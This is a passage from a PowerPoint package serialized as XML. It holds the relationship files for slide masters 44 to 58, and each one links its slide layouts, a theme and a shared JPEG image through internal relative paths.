Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout421.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout439.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout438.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout437.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout436.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout435.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout434.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout433.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout432.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout440.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout431.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout449.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout448.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout447.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout446.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout445.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout444.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout443.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout442.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout450.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout441.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout459.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout458.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout457.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout456.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout455.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout454.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout453.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout452.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout469.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout468.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout467.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout466.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout465.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout464.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout462.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout470.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout461.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout479.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout478.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout477.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout476.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout475.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout474.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout473.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout472.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme48.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout480.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout471.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout489.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout488.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout487.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout486.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout485.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout484.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout483.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout482.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme49.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout490.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout481.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout49.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout47.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout46.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout45.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout44.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout43.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout50.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout499.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout498.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout497.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout496.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout495.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout494.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout493.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout492.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme50.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout500.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout491.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout509.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout508.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout507.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout506.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout505.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout504.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout503.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout502.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme51.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout510.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout501.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout519.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout518.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout517.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout516.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout515.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout514.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout513.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout512.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme52.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout520.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout511.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout529.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout528.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout527.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout526.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout525.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout524.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout523.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout522.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme53.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout530.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout521.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout539.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout538.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout537.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout536.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout535.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout534.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout533.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout532.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme54.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout540.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout531.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout549.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout548.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout547.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout546.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout545.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout544.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout543.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout542.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme55.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout550.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout541.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout559.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout558.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout557.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout556.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout555.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout554.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout553.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout552.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme56.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout560.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout551.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout569.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout568.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout567.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout566.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout565.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout563.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout562.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme57.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout570.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout561.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout579.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout578.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout577.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout576.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout575.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout574.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout573.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout572.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme58.xml"/><Relationship Id="rId11" 